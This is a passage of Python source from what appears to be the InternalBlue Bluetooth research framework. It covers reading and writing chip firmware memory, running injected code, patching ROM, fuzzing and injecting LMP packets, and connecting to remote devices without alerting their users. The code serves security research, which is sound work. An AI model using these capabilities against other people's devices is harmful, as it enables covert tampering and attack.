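#   internalblue.registerHciCallback(my_callback)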
def unregisterHciCallback(self, callback):
# type: (Callable[[Tuple[HCI, int, int, int, Any, datetime.datetime]], None ]) -> None
"""
Remove a callback function from self.registeredHciCallbacks.
"""
if callback in self.registeredHciCallbacks:
self.registeredHciCallbacks.remove(callback)
return
self.logger.warning("registerHciCallback: no such callback is registered!")
def registerHciRecvQueue(self, queue, filter_function=None):
# type: (queue2k.Queue[Record], FilterFunction) -> None
"""
Add a new queue to self.registeredHciRecvQueues.
The queue will be filled by the recvThread every time the thread receives
a HCI packet. The format of the packet is a tuple containing:
- HCI packet (subclass of HCI, see hci.py)
- original length
- inc_len
- flags
- drops
- timestamp (python datetime object)
If filter_function is not None, the tuple will first be passed
to the function and only if the function returns True, the packet
is put into the queue.
"""
if queue in self.registeredHciRecvQueues:
self.logger.warning("registerHciRecvQueue: queue already registered!")
return
self.registeredHciRecvQueues.append((queue, filter_function))
def unregisterHciRecvQueue(self, queue):
# type: (queue2k.Queue[Tuple[HCI, int, int, int, Any, datetime]]) -> None
"""
Remove a queue from self.registeredHciRecvQueues.
"""
for entry in self.registeredHciRecvQueues:
if entry[0] == queue:
self.registeredHciRecvQueues.remove(entry)
return
self.logger.warning("registerHciRecvQueue: no such queue is registered!")
def sendHciCommand(
self, hci_opcode: HCI_COMND, data: bytes, timeout: int = 3
) -> Optional[bytearray]:
"""
Send an arbitrary HCI command packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
or the timeout expires. The return value is the Payload of the
HCI Command Complete Event which was received in response to
the command or None if no response was received within the timeout.
"""
# Support legacy code that passes an integer instead of a HCI_COMND for now
# This would be more elegant with a
# flag that can be set to allow arbitrary bytes for the HCI command but that would require literal types
# (PEP586) which are only supported with python 3.8+
# For static type analysis this is good enough, because if someone hardcodes some hci command they might as well document it
if isinstance(hci_opcode, HCI_COMND):
opcode = hci_opcode.value
elif isinstance(hci_opcode, int):
opcode = hci_opcode
else:
raise ValueError(
"opcode parameter to sendHciCommand must be either integer or HCI_COMND enum member"
)
# TODO: If the response is a HCI Command Status Event, we will actually
# return this instead of the Command Complete Event (which will
# follow later and will be ignored). This should be fixed..
queue = queue2k.Queue(1)
# standard HCI command structure
payload = p16(opcode) + p8(len(data)) + data
# define a filter function which recognizes the response (command complete
# or command status event).
def recvFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
self.logger.debug("sendHciCommand.recvFilterFunction: got response")
# Interpret HCI event
if isinstance(hcipkt, hci.HCI_Event):
if hcipkt.event_code == 0x0E: # Cmd Complete event
if u16(hcipkt.data[1:3]) == opcode:
return True
if hcipkt.event_code == 0x0F: # Cmd Status event
if u16(hcipkt.data[2:4]) == opcode:
return True
return False
try:
self.sendQueue.put(
(hci.HCI.HCI_CMD, payload, queue, recvFilterFunction), timeout=timeout
)
ret = queue.get(timeout=timeout)
return ret
except queue2k.Empty:
self.logger.warning("sendHciCommand: waiting for response timed out!")
# If there was no response because the trace replay hook threw an assertion,
# it is stored in this attribute. Re-raise it so the main thread does not
# ignore it and any testing framework can catch it.
if hasattr(self, "test_failed"):
raise self.test_failed
return None
except queue2k.Full:
self.logger.warning("sendHciCommand: send queue is full!")
return None
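# Illustrative sketch (not from the original source): issuing a standard HCI command
# and parsing its Command Complete payload, mirroring what initialize_fimware() does
# above; 'internalblue' stands for a connected instance of this core class.
#
#   version = internalblue.sendHciCommand(HCI_COMND.Read_Local_Version_Information, b"")
#   if version is not None:
#       lmp_subversion = u16(version[10:12])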
def sendH4(self, h4type, data, timeout=2):
# type: (HCI_CMD, bytes, int) -> bool
"""
Send an arbitrary H4 packet by pushing a send-task into the
sendQueue. This function does not wait for a response! If you
need to receive a response, register an hciRecvQueue or -callback.
The return value is True if the send-task could be put inside the
queue and False if it was not possible within the timeout.
"""
try:
self.sendQueue.put((h4type, data, None, None), timeout=timeout)
return True
except queue2k.Full:
self.logger.warning("sendH4: send queue is full!")
return False
def recvPacket(self, timeout=None):
# type: (Optional[int]) -> Optional[Record]
"""
This function polls the recvQueue for the next available HCI
packet and returns it. The function checks whether it is called
from the sendThread or any other thread and respectively chooses
either the sendThreadrecvQueue or the recvQueue. (FIXME: no it does not?!)
The recvQueue is filled by the recvThread. If the queue fills up
the recvThread empties the queue (unprocessed packets are lost).
The recvPacket function is meant to receive raw HCI packets in
a blocking manner. Consider using the registerHciCallback()
functionality as an alternative which works asynchronously.
"""
self.logger.debug("recvPacket: called")
if not self.check_running():
return None
try:
return self.recvQueue.get(timeout=timeout)
except queue2k.Empty:
return None
def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (Address, int, Optional[Any], int, int) -> Optional[bytes]
"""
Reads <length> bytes from the memory space of the firmware at the given
address. Reading from unmapped memory or certain memory-mapped-IO areas
which need aligned access crashes the chip.
Optional arguments for progress logs:
- progress_log: An instance of log.progress() which will be updated during the read.
- bytes_done: Number of bytes that have already been read with earlier calls to
readMem() and belonging to the same transaction which is covered by progress_log.
- bytes_total: Total bytes that will be read within the transaction covered by progress_log.
"""
self.logger.debug("readMem: reading at 0x%x" % address)
if not self.check_running():
return None
read_addr = address # read_addr is the address of the next Read_RAM HCI command
byte_counter = 0 # tracks the number of received bytes
outbuffer = (
bytearray()
) # buffer which stores all accumulated data read from the chip
if bytes_total == 0: # If no total bytes were given, just use the length
bytes_total = length
retry = 3 # Retry on failures
while (
read_addr < address + length
): # Send HCI Read_RAM commands until all data is received
# Send hci frame
bytes_left = length - byte_counter
blocksize = bytes_left
if blocksize > 251: # The max. size of a Read_RAM payload is 251
blocksize = 251
# Send Read_RAM (0xfc4d) command
response = self.sendHciCommand(
HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
)
if not response:
self.logger.warning(
"readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)"
% (read_addr, length)
)
# Retry once...
if retry > 0:
self.logger.debug("readMem: retrying once...")
retry = retry - 1
continue
else:
self.logger.warning("readMem: failed!")
return None
data = response[4:] # start of the actual data is at offset 4
if len(data) == 0: # this happens e.g. if not called on a Broadcom chip
self.logger.warning("readMem: empty response, quitting...")
break
if len(data) != blocksize:
self.logger.debug("readMem: insufficient bytes returned, retrying...")
continue
status = response[3]
if status != 0:
# The response is a Command Complete event (event code 0x0e); the 4th byte
# (response[3]) is the HCI error code:
#   0x00 means everything okay
#   0x12 means Command Disallowed
# For almost all memory addresses the status is 0, but for some it is not,
# e.g. for address 0xff000000 (aka 'EEPROM') it is 0x12.
self.logger.warning(
"readMem: [TODO] Got status != 0 : error 0x%02X at address 0x%08x"
% (status, read_addr)
)
break
# do double checking, but prevent loop
if self.doublecheck and retry > 0:
response_check = self.sendHciCommand(
HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
)
if response != response_check:
self.logger.debug(
"readMem: double checking response failed at 0x%x! retry..."
% read_addr
)
time.sleep(0.3)
retry = retry - 1
continue
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (
bytes_done + byte_counter,
bytes_total,
old_div((bytes_done + byte_counter) * 100, bytes_total),
)
progress_log.status(msg)
retry = 3 # this round worked, so we re-enable retries
return outbuffer
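# Illustrative sketch (not from the original source): dumping the first 4 KiB of the
# ROM section; readMem() transparently splits this into 251-byte Read_RAM commands.
#
#   rom_start = internalblue.readMem(0x0, 0x1000)
#   if rom_start is not None:
#       print(bytes_to_hex(rom_start[:16]))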
@needs_pwnlib
def readMemAligned(
self, address, length, progress_log=None, bytes_done=0, bytes_total=0
):
# type: (int, int, Optional[Any], int, int) -> Any
"""
This is an alternative to readMem() which enforces a strictly aligned access
to the memory that is read. This is needed for e.g. the memory-mapped-IO
section at 0x310000 (patchram) and possibly other sections as well.
The arguments are equivalent to readMem() except that the address and length
have to be 4-byte aligned.
The current implementation works like this (and obviously can be improved!):
- Work in chunks of max. 244 bytes (restricted by max. size of HCI event)
- For each chunk do:
- Write a code snippet to the firmware which copies the chunk of memory
into a custom HCI Event and sends it to the host (this uses aligned
ldr and str instructions)
- Register a hciCallbackFunction for receiving the custom event
"""
# Check if constants are defined in fw.py
for const in ["READ_MEM_ALIGNED_ASM_LOCATION", "READ_MEM_ALIGNED_ASM_SNIPPET"]:
if const not in dir(self.fw):
self.logger.warning(
"readMemAligned: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
if not self.check_running():
return None
# Force length to be multiple of 4 (needed for strict alignment)
if length % 4 != 0:
self.logger.warning("readMemAligned: length (0x%x) must be multiple of 4!" % length)
return None
# Force address to be multiple of 4 (needed for strict alignment)
if address % 4 != 0:
self.logger.warning("readMemAligned: address (0x%x) must be 4-byte aligned!" % address)
return None
recvQueue = queue2k.Queue(1)
def hciFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return False
if hcipkt.event_code != 0xFF:
return False
if hcipkt.data[0:4] != bytes("READ", "utf-8"):
return False
return True
self.registerHciRecvQueue(recvQueue, hciFilterFunction)
read_addr = address
byte_counter = 0
outbuffer = (
bytearray()
)
if bytes_total == 0:
bytes_total = length
while read_addr < address + length:
bytes_left = length - byte_counter
blocksize = bytes_left
if blocksize > 244:
blocksize = 244
# Customize the assembler snippet with the current read_addr and blocksize
code = asm(
self.fw.READ_MEM_ALIGNED_ASM_SNIPPET
% (blocksize, read_addr, old_div(blocksize, 4)),
vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION,
arch="thumb",
)
# Write snippet to the RAM (TODO: maybe backup and restore content of this area?)
self.writeMem(self.fw.READ_MEM_ALIGNED_ASM_LOCATION, code)
# Run snippet
if not self.launchRam(self.fw.READ_MEM_ALIGNED_ASM_LOCATION):
# on iOSCore the return value might be wrong
if self.doublecheck:
self.logger.debug("readMemAligned: probably failed, but continuing...")
else:
self.logger.error("readMemAligned: launching assembler snippet failed!")
return None
# wait for the custom HCI event sent by the snippet:
try:
record = recvQueue.get(timeout=1)
except queue2k.Empty:
self.logger.warning("readMemAligned: No response from assembler snippet.")
return None
hcipkt = record[0]
data = hcipkt.data[4:]
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (
bytes_done + byte_counter,
bytes_total,
old_div((bytes_done + byte_counter) * 100, bytes_total),
)
progress_log.status(msg)
self.unregisterHciRecvQueue(recvQueue)
return outbuffer
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, bytes, Optional[Any], int, int) -> Optional[bool]
"""
Writes the <data> to the memory space of the firmware at the given
address.
Optional arguments for progress logs:
- progress_log: An instance of log.progress() which will be updated during the write.
- bytes_done: Number of bytes that have already been written with earlier calls to
writeMem() and belonging to the same transaction which is covered by progress_log.
- bytes_total: Total bytes that will be written within the transaction covered by progress_log.
"""
self.logger.debug("writeMem: writing to 0x%x" % address)
if not self.check_running():
return None
write_addr = address
byte_counter = 0
if bytes_total == 0:
bytes_total = len(data)
while byte_counter < len(data):
# Send hci frame
bytes_left = len(data) - byte_counter
blocksize = bytes_left
if blocksize > 251:
blocksize = 251
response = self.sendHciCommand(
HCI_COMND.VSC_Write_RAM,
p32(write_addr) + data[byte_counter: byte_counter + blocksize],
)
if response is None:
self.logger.warning(
"writeMem: Timeout while reading response, probably need to wait longer."
)
return False
elif response[3] != 0:
self.logger.warning(
"writeMem: Got error code %d in command complete event."
% response[3]
)
return False
write_addr += blocksize
byte_counter += blocksize
if progress_log is not None:
msg = "sending data... %d / %d Bytes" % (
bytes_done + byte_counter,
bytes_total,
)
progress_log.status(msg)
return True
def launchRam(self, address):
# type: (int) -> bool
"""
Executes a function at the specified address in the self.context of the HCI
handler thread. The function has to comply with the calling convention.
As the function blocks the HCI handler thread, the chip will most likely
crash (or be reset by Android) if the function takes too long.
"""
response = self.sendHciCommand(HCI_COMND.VSC_Launch_RAM, p32(address))
if response is None:
self.logger.warning(
"Empty HCI response during launchRam, driver crashed due to invalid code or destination"
)
return False
error_code = response[3]
if error_code != 0:
self.logger.warning("Got error code %x in command complete event." % error_code)
return False
# Nexus 6P Bugfix
if "LAUNCH_RAM_PAUSE" in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE:
self.logger.debug("launchRam: Bugfix, sleeping %ds" % self.fw.LAUNCH_RAM_PAUSE)
time.sleep(self.fw.LAUNCH_RAM_PAUSE)
return True
def getPatchramState(self):
# type: () -> Union[bool, Tuple[List[Optional[int]], List[Union[Union[int, bytes, None], Any]], list]]
"""
Retrieves the current state of the patchram unit. The return value
is a tuple containing 3 lists which are indexed by the slot number:
- target_addresses: The address which is patched by this slot (or None)
- new_values: The new (patch) value (or None)
- enabled_bitmap: 1 if the slot is active, 0 if not (integer)
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
"PATCHRAM_ALIGNED",
]:
if const not in dir(self.fw):
self.logger.warning(
"getPatchramState: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return False
slot_count = self.fw.PATCHRAM_NUMBER_OF_SLOTS
# On Nexus 5, ReadMemAligned is required, while Nexus 6P supports this memory area with ReadRAM
if self.fw.PATCHRAM_ALIGNED:
slot_dump = self.readMemAligned(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMemAligned(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
else:
slot_dump = self.readMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
table_val_dump = self.readMem(
self.fw.PATCHRAM_VALUE_TABLE_ADDRESS, slot_count * 4
)
table_addresses = []
table_values = []
slot_dwords = []
slot_bits = []
for dword in range(old_div(slot_count, 32)):
slot_dwords.append(slot_dump[dword * 32: (dword + 1) * 32])
for dword in slot_dwords:
slot_bits.extend(bits(bytes(dword[::-1]))[::-1])
for i in range(slot_count):
if slot_bits[i]:
table_addresses.append(u32(table_addr_dump[i * 4: i * 4 + 4]) << 2)
table_values.append(table_val_dump[i * 4: i * 4 + 4])
else:
table_addresses.append(None)
table_values.append(None)
return (table_addresses, table_values, slot_bits)
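# Illustrative sketch (not from the original source): listing the currently active
# patchram slots from the state returned above.
#
#   addresses, values, enabled = internalblue.getPatchramState()
#   for i, addr in enumerate(addresses):
#       if addr is not None:
#           print("slot %3d: 0x%08x -> %s" % (i, addr, bytes_to_hex(values[i])))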
def patchRom(self, address, patch, slot=None):
# type: (Address, Any, Optional[Any]) -> bool
"""
Patch a 4-byte value (DWORD) inside the ROM section of the firmware
(0x0 - 0x8FFFF) using the patchram mechanism. There are 128 available
slots for patches and patchRom() will automatically find the next free
slot if it is not forced through the 'slot' argument (see also
getPatchramState()).
address: The address at which the patch should be applied
(if the address is not 4-byte aligned, the patch will be split into two slots)
patch: The new value which should be placed at the address (byte string of length 4)
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
]:
if const not in dir(self.fw):
self.logger.warning("patchRom: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
if len(patch) != 4:
self.logger.warning("patchRom: patch (%s) must be a 32-bit dword!" % patch)
return False
self.logger.debug(
"patchRom: applying patch 0x%x to address 0x%x" % (u32(patch), address)
)
alignment = address % 4
if alignment != 0:
self.logger.debug("patchRom: Address 0x%x is not 4-byte aligned!" % address)
if slot is not None:
self.logger.warning(
"patchRom: Patch must be splitted into two slots, but fixed slot value was enforced. Do nothing!"
)
return False
self.logger.debug("patchRom: applying patch 0x%x in two rounds" % u32(patch))
# read original content
orig = self.readMem(address - alignment, 8)
# patch the difference of the 4 bytes we want to patch within the original 8 bytes
self.patchRom(
address - alignment, orig[:alignment] + patch[: 4 - alignment], slot
)
self.patchRom(
address - alignment + 4,
patch[4 - alignment:] + orig[alignment + 4:],
slot,
)
return True
table_addresses, table_values, table_slots = self.getPatchramState()
# Check whether the address is already patched:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
self.logger.info(
"patchRom: Reusing slot for address 0x%x: %d" % (address, slot)
)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
return True
if slot is None:
# Find free slot:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] is None:
slot = i
self.logger.info("patchRom: Choosing next free slot: %d" % slot)
break
if slot is None:
self.logger.warning("patchRom: All slots are in use!")
return False
else:
if table_slots[slot] == 1: # slot is already enabled in the bitmap
self.logger.warning("patchRom: Slot %d is already in use. Overwriting..." % slot)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
# Write address to patchram target table at 0x310000
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(address >> 2)
)
# Enable patchram slot (enable bitfield starts at 0x310204)
# (We need to enable the slot by setting a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 1
slot_dword = unbits(
table_slots[target_dword * 32: (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
return True
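# Illustrative sketch (not from the original source): patching a single ROM dword and
# removing the patch again; 0x1234 is a placeholder address inside the ROM section.
#
#   internalblue.patchRom(0x1234, p32(0xDEADBEEF))
#   internalblue.disableRomPatch(0x1234)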
def disableRomPatch(self, address, slot=None):
# type: (int, Optional[int]) -> bool
"""
Disable a patchram slot (see also patchRom()). The slot can either be
specified by the target address (address that was patched) or by providing
the slot number directly (the address will be ignored in this case).
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
]:
if const not in dir(self.fw):
self.logger.warning(
"disableRomPatch: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
table_addresses, table_values, table_slots = self.getPatchramState()
if slot is None:
if address is None:
self.logger.warning("disableRomPatch: address is None.")
return False
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
self.logger.info("Slot for address 0x%x is: %d" % (address, slot))
break
if slot is None:
self.logger.warning("No slot contains address: 0x%x" % address)
return False
# Disable patchram slot (enable bitfield starts at 0x310204)
# (We need to disable the slot by clearing a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 0
slot_dword = unbits(
table_slots[target_dword * 32: (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
# Write 0xFFFFC to patchram target table at 0x310000
# (0xFFFFC seems to be the default value if the slot is inactive)
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(0xFFFFC >> 2)
)
return True
def readConnectionInformation(self, conn_number):
# type: (ConnectionNumber) -> Optional[ConnectionInformation]
"""
Reads and parses a connection struct based on the connection number.
Note: The connection number is different from the connection index!
The connection number starts counting at 1 and is stored in the first
field of the connection structure.
The connection index starts at 0 and is the index into the connection
table (table containing all connection structs).
In the Nexus 5 firmware all connection numbers are simply the connection
index increased by 1.
The return value is a ConnectionInformation object containing all information that could
be parsed from the connection structure. If the connection struct at the
specified connection number is empty, the return value is None.
"""
# Check if constants are defined in fw.py
# Do we have an array implementation?
is_array = True
for const in [
"CONNECTION_MAX",
"CONNECTION_ARRAY_ADDRESS",
"CONNECTION_STRUCT_LENGTH",
]:
if const not in dir(self.fw):
is_array = False
# Do we have a list implementation?
for const in ["CONNECTION_LIST_ADDRESS"]:
if const not in dir(self.fw):
self.logger.warning(
"readConnectionInformation: neither CONNECTION_LIST nor CONNECTION_ARRAY in fw.py. FEATURE NOT SUPPORTED!"
)
return None
if conn_number < 1 or conn_number > self.fw.CONNECTION_MAX:
self.logger.warning(
"readConnectionInformation: connection number out of bounds: %d"
% conn_number
)
return None
if is_array:
connection = self.readMem(
Address(
self.fw.CONNECTION_ARRAY_ADDRESS
+ self.fw.CONNECTION_STRUCT_LENGTH * (conn_number - 1)
),
self.fw.CONNECTION_STRUCT_LENGTH,
)
else:
connection_memaddr = Address(
u32(
self.readMem(
Address(
self.fw.CONNECTION_LIST_ADDRESS + 4 * (conn_number - 1)
),
4,
)
)
)
if connection_memaddr == 0x00000000:
return None
connection = self.readMem(
connection_memaddr, self.fw.CONNECTION_STRUCT_LENGTH
)
if connection == b"\x00" * self.fw.CONNECTION_STRUCT_LENGTH:
return None
conn_dict = ConnectionInformation.from_connection_buffer(connection)
return conn_dict
def sendLmpPacket(
self, opcode, payload="", is_master=True, conn_handle=0x0C, extended_op=False
):
# type: (Opcode, bytes, bool, ConnectionNumber, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This code is using the vendor specific HCI command 0xfc58, which sends
an LMP PDU. Note that Broadcom firmware internally checks opcodes and
lengths, meaning that despite returning success long payloads will be
cut and invalid opcodes might be discarded.
is_master: Determines if we are master or slave within the connection.
conn_handle: The connection handle specifying the connection into which the
packet will be injected. By default, the first connection handle
used by Broadcom is 0x0c.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Can be empty.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check the connection handle
# Range: 0x0000-0x0EFF (all other values reserved for future use)
if conn_handle < 0 or conn_handle > 0x0EFF:
self.logger.warning("sendLmpPacket: connection handle out of bounds: %d" % conn_handle)
return False
# payload must be bytes...
if payload is None:
payload = b""
if ((not extended_op) and opcode > (0xFF >> 1)) or (
extended_op and opcode > 0xFF
):
self.logger.warning("sendLmpPacket: opcode out of range!")
return False
# Build the LMP packet
opcode_data = (
p8(opcode << 1 | (not is_master))
if not extended_op
else p8(0x7F << 1 | (not is_master)) + p8(opcode)
)
# Nexus 5 (2012) simply takes any length as argument, but later withdraws bytes if too many were passed.
# Nexus 6P, Raspi 3+ and evaluation board (2014-2018) require a fixed 20 byte length parameter to be passed!
# -> 2 bytes connection handle, 1 byte length, which means 17 bytes for opcode and payload remaining
# sendlmp --data 11223344556677889900112233445566 01 -> actually works
# always pad to 17 data bytes...
data = opcode_data + payload + b"\x00" * (17 - len(opcode_data) - len(payload))
if len(data) > 17:
self.logger.warning(
"sendLmpPacket: Vendor specific HCI command only allows for 17 bytes LMP content."
)
# self.logger.info("packet: " + p16(conn_handle) + p8(len(data)) + data)
result = self.sendHciCommand(
HCI_COMND.VSC_SendLmpPdu,
p16(conn_handle) + p8(len(payload + opcode_data)) + data,
)
if result is None:
self.logger.warning(
"sendLmpPacket: did not get a result from firmware, maybe crashed internally?"
)
return False
else:
error_status = result[3]
if error_status != 0:
self.logger.warning("sendLmpPacket: got error status 0x%02x" % error_status)
return False
return True
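# Illustrative sketch (not from the original source): injecting an LMP PDU into the
# default Broadcom connection handle; opcode and payload are placeholders and are
# validated by the firmware as noted in the docstring above.
#
#   internalblue.sendLmpPacket(0x01, payload=b"\x00", conn_handle=0x0c)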
@needs_pwnlib
def fuzzLmp(self):
# type: ()-> bool
"""
Installs a patch inside the sendLmp HCI handler that allows sending arbitrary
LMP payloads. Afterwards, use sendLmpPacket as before.
Basically, this ignores LM_LmpInfoTable and LM_LmpInfoTableEsc4 contents, but
only via sendLmp HCI and not during normal Link Manager operation.
"""
# Check if constants are defined in fw.py
for const in [
"FUZZLMP_CODE_BASE_ADDRESS",
"FUZZLMP_ASM_CODE",
"FUZZLMP_HOOK_ADDRESS",
]:
if const not in dir(self.fw):
self.logger.warning(
"fuzzLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Assemble the snippet and write it to FUZZLMP_CODE_BASE_ADDRESS
code = asm(
self.fw.FUZZLMP_ASM_CODE,
vma=self.fw.FUZZLMP_CODE_BASE_ADDRESS,
arch="thumb",
)
self.writeMem(self.fw.FUZZLMP_CODE_BASE_ADDRESS, code)
# Install a patch in the end of the original sendLmpPdu HCI handler
patch = asm(
"b 0x%x" % self.fw.FUZZLMP_CODE_BASE_ADDRESS,
vma=self.fw.FUZZLMP_HOOK_ADDRESS,
)
if not self.patchRom(self.fw.FUZZLMP_HOOK_ADDRESS, patch):
self.logger.warning("Error writing to patchram when installing fuzzLmp patch!")
return False
return True
@needs_pwnlib
def sendLmpPacketLegacy(self, conn_nr, opcode, payload, extended_op=False):
# type: (int, Opcode, bytes, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This is legacy code only running on BCM4339 based on assembly patches.
conn_nr: The connection number specifying the connection into which the
packet will be injected.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Note: The size of the payload is defined by its opcode.
TODO: Go one step deeper in order to send arbitrary length
LMP packets.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"CONNECTION_MAX",
"SENDLMP_CODE_BASE_ADDRESS",
"SENDLMP_ASM_CODE",
]:
if const not in dir(self.fw):
self.logger.warning(
"sendLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# connection number bounds check
if conn_nr < 1 or conn_nr > self.fw.CONNECTION_MAX:
self.logger.warning("sendLmpPacket: connection number out of bounds: %d" % conn_nr)
return False
# Build the LMP packet
# (The TID bit will later be set in the assembler code)
opcode_data = p8(opcode << 1) if not extended_op else p8(0x7F << 1) + p8(opcode)
data = opcode_data + payload
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr) # type: str
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in data.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLMP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLMP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLMP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLMP_CODE_BASE_ADDRESS):
return True
else:
self.logger.warning("sendLmpPacket: launchRam failed!")
return False
@needs_pwnlib
def sendLcpPacket(self, conn_idx, payload):
# type: (ConnectionIndex, bytes) -> bool
"""
Inject a LCP packet into a Bluetooth LE connection (i.e. send a LCP packet
to a remote device which is paired and connected with our local device).
This code requires assembly patches.
conn_idx: The connection index specifying the connection into which the
packet will be injected, starting at 0.
payload: The LCP opcode and payload of the LCP packet that will be injected.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in ["SENDLCP_CODE_BASE_ADDRESS", "SENDLCP_ASM_CODE"]:
if const not in dir(self.fw):
self.logger.warning(
"sendLcpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Prepare the assembler snippet by injecting the connection index
# and appending the LCP packet data.
asm_code = self.fw.SENDLCP_ASM_CODE % (conn_idx, len(payload))
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in payload.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLCP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLCP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLCP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLCP_CODE_BASE_ADDRESS):
return True
else:
self.logger.warning("sendLcpPacket: launchRam failed!")
return False
def connectToRemoteDevice(self, bt_addr):
# type: (BluetoothAddress) -> None
"""
Send a HCI Connect Command to the firmware. This will setup
a connection (inserted into the connection structure) if the
remote device (specified by bt_addr) accepts.
To be exact: This will most likely send
- LMP_features_req
- LMP_version_req
- LMP_features_req_ext
- LMP_host_connection_req
- LMP_setup_complete
and also other channel-related packets to the remote device.
The devices do not have to be paired and the remote device
does not need to be visible. This will not initiate the
pairing sequence, therefore the remote host will not show
any notification to the user yet, the host is however notified
via HCI that there is an incoming connection.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's).
self.sendHciCommand(
HCI_COMND.Create_Connection, bt_addr[::-1] + b"\x00\x00\x00\x00\x00\x00\x01"
)
def connectToRemoteLEDevice(self, bt_addr, addr_type=0x00):
# type: (BluetoothAddress, int) -> None
"""
Send a HCI LE Create Connection Command to the firmware as
defined in the Bluetooth Core Specification 5.0 p. 1266.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
addr_type: Public Device (0x00), Random Device (0x01), Public
Identity (0x02), Random static Identity (0x03).
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's).
self.sendHciCommand(
HCI_COMND.LE_Create_Connection,
b"\x60\x00\x30\x00\x00"
